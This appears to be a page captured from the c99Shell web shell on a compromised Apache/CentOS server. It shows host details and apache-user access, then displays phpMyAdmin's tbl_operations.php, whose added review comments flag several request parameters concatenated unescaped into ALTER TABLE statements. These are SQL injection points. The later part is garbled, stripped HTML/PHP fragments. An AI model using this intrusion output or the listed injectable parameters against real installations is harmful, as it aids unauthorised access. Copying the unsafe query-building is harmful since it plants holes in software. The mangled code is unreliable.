!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/   drwxrwxrwx
Free 52.61 GB of 127.8 GB (41.16%)


Viewing file:     tbl_operations.php (30.77 KB)      -rw-r--r--
// Request handling from tbl_operations.php: builds ALTER TABLE statements from
// request parameters, runs them, then prepares the data for the page.
// NOTE(review): this listing starts mid-statement. The beginning of the file,
// including the opening of the block that is closed further down, is not part
// of the capture, so nothing before this point can be reviewed from here.
        rename($_REQUEST['new_name'])) {
            $_message .= $pma_table->getLastMessage();
            $result = true;
            $GLOBALS['table'] = $pma_table->getName();
            $reread_info = true;
            $reload = true;
        } else {
            $_message .= $pma_table->getLastError();
            $result = false;
        }
    }
    // The comment is the only option below that is placed inside a quoted SQL
    // string literal after passing through PMA_sqlAddslashes().
    if (isset($_REQUEST['comment'])
        && urldecode($_REQUEST['prev_comment']) !== $_REQUEST['comment']) {
        $table_alters[] = 'COMMENT = \'' . PMA_sqlAddslashes($_REQUEST['comment']) . '\'';
    }
    // NOTE(review): new_tbl_type is concatenated into the ALTER TABLE clause
    // exactly as received; no escaping and no check against the list of
    // available engines is visible in this fragment. If validation exists it
    // must happen before this point -- confirm.
    if (! empty($_REQUEST['new_tbl_type'])
        && strtolower($_REQUEST['new_tbl_type']) !== strtolower($tbl_type)) {
        $table_alters[] = 'ENGINE = ' . $_REQUEST['new_tbl_type'];
        $tbl_type = $_REQUEST['new_tbl_type'];
        // reset the globals for the new engine
        PMA_set_global_variables_for_engine($tbl_type);

        if ($is_aria) {
            $transactional = (isset($transactional) && $transactional == '0') ? '0' : '1';
            $page_checksum = (isset($page_checksum)) ? $page_checksum : '';
        }
    }

    // The collation goes through PMA_generateCharsetQueryPart(); what that
    // helper validates is not visible here.
    if (! empty($_REQUEST['tbl_collation'])
        && $_REQUEST['tbl_collation'] !== $tbl_collation) {
        $table_alters[] = 'DEFAULT ' . PMA_generateCharsetQueryPart($_REQUEST['tbl_collation']);
    }

    // NOTE(review): new_pack_keys is also appended as received (loose != against
    // the current value, no cast or allow-list visible) -- confirm it is
    // constrained elsewhere.
    if (($is_myisam_or_aria || $is_isam)
        && isset($_REQUEST['new_pack_keys'])
        && $_REQUEST['new_pack_keys'] != (string)$pack_keys) {
        $table_alters[] = 'pack_keys = ' . $_REQUEST['new_pack_keys'];
    }

    // The four flag options below are first normalised to the strings '0' or
    // '1', so only those two values can reach the query text.
    $checksum = empty($checksum) ? '0' : '1';
    $_REQUEST['new_checksum'] = empty($_REQUEST['new_checksum']) ? '0' : '1';
    if ($is_myisam_or_aria
        && $_REQUEST['new_checksum'] !== $checksum) {
        $table_alters[] = 'checksum = ' . $_REQUEST['new_checksum'];
    }

    $_REQUEST['new_transactional'] = empty($_REQUEST['new_transactional']) ? '0' : '1';
    if ($is_aria
        && $_REQUEST['new_transactional'] !== $transactional) {
        $table_alters[] = 'TRANSACTIONAL = ' . $_REQUEST['new_transactional'];
    }

    $_REQUEST['new_page_checksum'] = empty($_REQUEST['new_page_checksum']) ? '0' : '1';
    if ($is_aria
        && $_REQUEST['new_page_checksum'] !== $page_checksum) {
        $table_alters[] = 'PAGE_CHECKSUM = ' . $_REQUEST['new_page_checksum'];
    }

    $delay_key_write = empty($delay_key_write) ? '0' : '1';
    $_REQUEST['new_delay_key_write'] = empty($_REQUEST['new_delay_key_write']) ? '0' : '1';
    if ($is_myisam_or_aria
        && $_REQUEST['new_delay_key_write'] !== $delay_key_write) {
        $table_alters[] = 'delay_key_write = ' . $_REQUEST['new_delay_key_write'];
    }

    // NOTE(review): in the next two clauses the PMA_sqlAddslashes() result is
    // placed outside quotes. Escaping quote characters presumably does not
    // constrain an unquoted value; an integer check for auto_increment and a
    // comparison against the known row formats would -- confirm whether either
    // is done before this point.
    if (($is_myisam_or_aria || $is_innodb || $is_pbxt)
        && ! empty($_REQUEST['new_auto_increment'])
        && (! isset($auto_increment) || $_REQUEST['new_auto_increment'] !== $auto_increment)) {
        $table_alters[] = 'auto_increment = ' . PMA_sqlAddslashes($_REQUEST['new_auto_increment']);
    }

    if (($is_myisam_or_aria || $is_innodb || $is_pbxt)
        && ! empty($_REQUEST['new_row_format'])
        && (! isset($row_format) || strtolower($_REQUEST['new_row_format']) !== strtolower($row_format))) {
        $table_alters[] = 'ROW_FORMAT = ' . PMA_sqlAddslashes($_REQUEST['new_row_format']);
    }

    // All collected clauses are sent as a single ALTER TABLE statement.
    if (count($table_alters) > 0) {
        $sql_query = 'ALTER TABLE ' . PMA_backquote($GLOBALS['table']);
        $sql_query .= "\r\n" . implode("\r\n", $table_alters);
        // NOTE(review): `.=` is string concatenation, so $result stops being a
        // boolean here ('1' or '' is appended to whatever it held). This looks
        // unintended; later code only tests $result for truthiness -- confirm.
        $result .= PMA_DBI_query($sql_query) ? true : false;
        $reread_info = true;
        unset($table_alters);
        foreach (PMA_DBI_get_warnings() as $warning) {
            // In MariaDB 5.1.44, when altering a table from Maria to MyISAM
            // and if TRANSACTIONAL was set, the system reports an error;
            // I discussed with a Maria developer and he agrees that this
            // should not be reported with a Level of Error, so here
            // I just ignore it. But there are other 1478 messages
            // that it's better to show.
            if (! ($_REQUEST['new_tbl_type'] == 'MyISAM' && $warning['Code'] == '1478' && $warning['Level'] == 'Error')) {
                $warning_messages[] = $warning['Level'] . ': #' . $warning['Code']
                    . ' ' . $warning['Message'];
            }
        }
    }
}

/**
 * Reordering the table has been requested by the user
 */
// The column name is URL-decoded and wrapped by PMA_backquote() (presumably
// identifier quoting -- the helper is not shown). The direction is compared
// strictly with 'desc' and only the literal ' DESC' is appended, so the
// request value itself never enters the query.
if (isset($_REQUEST['submitorderby']) && ! empty($_REQUEST['order_field'])) {
    $sql_query = ' ALTER TABLE ' . PMA_backquote($GLOBALS['table']) . ' ORDER BY ' . PMA_backquote(urldecode($_REQUEST['order_field']));
    if (isset($_REQUEST['order_order']) && $_REQUEST['order_order'] === 'desc') {
        $sql_query .= ' DESC';
    }
    $result = PMA_DBI_query($sql_query);
} // end if

/**
 * A partition operation has been requested by the user
 */
// NOTE(review): partition_operation and partition_name are both concatenated
// into the statement as received. No check against a fixed list of operations
// and no identifier quoting of the partition name is visible in this fragment;
// compare with the ORDER BY handling above, which quotes its identifier.
if (isset($_REQUEST['submit_partition']) && ! empty($_REQUEST['partition_operation'])) {
    $sql_query = 'ALTER TABLE ' . PMA_backquote($GLOBALS['table']) . ' ' . $_REQUEST['partition_operation'] . ' PARTITION ' . $_REQUEST['partition_name'];
    $result = PMA_DBI_query($sql_query);
} // end if

if ($reread_info) {
    // to avoid showing the old value (for example the AUTO_INCREMENT) after
    // a change, clear the cache
    PMA_Table::$cache = array();
    $page_checksum = $checksum = $delay_key_write = 0;
    require './libraries/tbl_info.inc.php';
}
unset($reread_info);

/**
 * Displays top menu links
 */
require_once './libraries/tbl_links.inc.php';

// Show the outcome of whichever statement ran above, unless the request
// already supplied its own message_to_show.
if (isset($result) && empty($message_to_show)) {
    // set to success by default, because result set could be empty
    // (for example, a table rename)
    $_type = 'success';
    if (empty($_message)) {
        $_message = $result ? __('Your SQL query has been executed successfully') : __('Error');
        // $result should exist, regardless of $_message
        $_type = $result ? 'success' : 'error';
    }
    // Collected server warnings replace the message and mark it as an error.
    if (! empty($warning_messages)) {
        $_message = new PMA_Message;
        $_message->addMessages($warning_messages);
        $_message->isError(true);
        unset($warning_messages);
    }
    PMA_showMessage($_message, $sql_query, $_type);
    unset($_message, $_type);
}

$url_params['goto'] = 'tbl_operations.php';
$url_params['back'] = 'tbl_operations.php';

/**
 * Get columns names
 */
// Table and database names come from $GLOBALS and are wrapped by
// PMA_backquote(); the result is keyed by the 'Field' column.
$local_query = ' SHOW COLUMNS FROM ' . PMA_backquote($GLOBALS['table']) . ' FROM ' . PMA_backquote($GLOBALS['db']);
$columns = PMA_DBI_fetch_result($local_query, null, 'Field');
unset($local_query);

/**
 * Displays the page
 */
?>
.table):'); ?> databases) > $GLOBALS['cfg']['MaxDbList']) { ?>  . 

5.0.4, >4.1.12 and >4.0.11, so I decided not to // check for version ?>
0 && ($is_myisam_or_aria || $is_innodb || $is_pbxt)) { ?> array( 'FIXED' => 'FIXED', 'DYNAMIC' => 'DYNAMIC', 'PAGE' => 'PAGE' ), 'MARIA' => array( 'FIXED' => 'FIXED', 'DYNAMIC' => 'DYNAMIC', 'PAGE' => 'PAGE' ), 'MYISAM' => array( 'FIXED' => 'FIXED', 'DYNAMIC' => 'DYNAMIC' ), 'PBXT' => array( 'FIXED' => 'FIXED', 'DYNAMIC' => 'DYNAMIC' ), 'INNODB' => array( 'COMPACT' => 'COMPACT', 'REDUNDANT' => 'REDUNDANT') ); $innodb_engine_plugin = PMA_StorageEngine::getEngine('innodb'); $innodb_plugin_version = $innodb_engine_plugin->getInnodbPluginVersion(); if (!empty($innodb_plugin_version)) { $innodb_file_format = $innodb_engine_plugin->getInnodbFileFormat(); } else { $innodb_file_format = ''; } if ('Barracuda' == $innodb_file_format && $innodb_engine_plugin->supportsFilePerTable()) { $possible_row_formats['INNODB']['DYNAMIC'] = 'DYNAMIC'; $possible_row_formats['INNODB']['COMPRESSED'] = 'COMPRESSED'; } unset($innodb_engine_plugin, $innodb_plugin_version, $innodb_file_format); // for MYISAM there is also COMPRESSED but it can be set only by the // myisampack utility, so don't offer here the choice because if we // try it inside an ALTER TABLE, MySQL (at least in 5.1.23-maria) // does not return a warning // (if the table was compressed, it can be seen on the Structure page) if (isset($possible_row_formats[$tbl_type])) { $current_row_format = strtoupper($showtable['Row_format']); echo ''; echo ''; echo ''; } ?>
/>
/>
/>
/>
'; echo PMA_generate_html_dropdown('new_row_format', $possible_row_formats[$tbl_type], $current_row_format, 'new_row_format'); unset($possible_row_formats, $current_row_format); echo '
.table):'); ?> databases) > $GLOBALS['cfg']['MaxDbList']) { ?>  . 
__('Structure only'), 'data' => __('Structure and data'), 'dataonly' => __('Data only')); PMA_display_html_radio('what', $choices, 'data', true); unset($choices); ?>


/>

    'CHECK TABLE ' . PMA_backquote($GLOBALS['table']), 'table_maintenance' => 'Go', )); ?>
  • 'ALTER TABLE ' . PMA_backquote($GLOBALS['table']) . ' ENGINE = InnoDB')); ?>
  • 'ANALYZE TABLE ' . PMA_backquote($GLOBALS['table']), 'table_maintenance' => 'Go', )); ?>
  • 'REPAIR TABLE ' . PMA_backquote($GLOBALS['table']), 'table_maintenance' => 'Go', )); ?>
  • 'OPTIMIZE TABLE ' . PMA_backquote($GLOBALS['table']), 'table_maintenance' => 'Go', )); ?>
  • 'FLUSH TABLE ' . PMA_backquote($GLOBALS['table']), 'message_to_show' => sprintf(__('Table %s has been flushed'), htmlspecialchars($GLOBALS['table'])), 'reload' => 1, )); ?>
    $this_sql_query, 'goto' => 'tbl_structure.php', 'reload' => '1', 'message_to_show' => sprintf(__('Table %s has been emptied'), htmlspecialchars($table)), )); ?>
  • $this_sql_query, 'goto' => 'db_operations.php', 'reload' => '1', 'purge' => '1', 'message_to_show' => sprintf(($tbl_is_view ? __('View %s has been dropped') : __('Table %s has been dropped')), htmlspecialchars($table)), // table name is needed to avoid running // PMA_relationsCleanupDatabase() on the whole db later 'table' => $GLOBALS['table'], )); ?>
' . "\n"; foreach($partition_names as $one_partition) { $one_partition = htmlspecialchars($one_partition); $html_select .= '' . "\n"; } $html_select .= '' . "\n"; printf(__('Partition %s'), $html_select); unset($partition_names, $one_partition, $html_select); $choices = array( 'ANALYZE' => __('Analyze'), 'CHECK' => __('Check'), 'OPTIMIZE' => __('Optimize'), 'REBUILD' => __('Rebuild'), 'REPAIR' => __('Repair')); PMA_display_html_radio('partition_operation', $choices, '', false); unset($choices); echo PMA_showMySQLDocu('partitioning_maintenance', 'partitioning_maintenance'); // I'm not sure of the best way to display that; this link does // not depend on the Go button $this_url_params = array_merge($url_params, array( 'sql_query' => 'ALTER TABLE ' . PMA_backquote($GLOBALS['table']) . ' REMOVE PARTITIONING' )); ?>
    $arr) { $join_query = 'SELECT ' . PMA_backquote($GLOBALS['table']) . '.* FROM ' . PMA_backquote($GLOBALS['table']) . ' LEFT JOIN ' . PMA_backquote($arr['foreign_table']); if ($arr['foreign_table'] == $GLOBALS['table']) { $foreign_table = $GLOBALS['table'] . '1'; $join_query .= ' AS ' . PMA_backquote($foreign_table); } else { $foreign_table = $arr['foreign_table']; } $join_query .= ' ON ' . PMA_backquote($GLOBALS['table']) . '.' . PMA_backquote($master) . ' = ' . PMA_backquote($foreign_table) . '.' . PMA_backquote($arr['foreign_field']) . ' WHERE ' . PMA_backquote($foreign_table) . '.' . PMA_backquote($arr['foreign_field']) . ' IS NULL AND ' . PMA_backquote($GLOBALS['table']) . '.' . PMA_backquote($master) . ' IS NOT NULL'; $this_url_params = array_merge($url_params, array('sql_query' => $join_query)); echo '
  • ' . '' . $master . ' -> ' . $arr['foreign_table'] . '.' . $arr['foreign_field'] . '
  • ' . "\n"; } // foreach $foreign unset($foreign_table, $join_query); ?>

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0061 ]--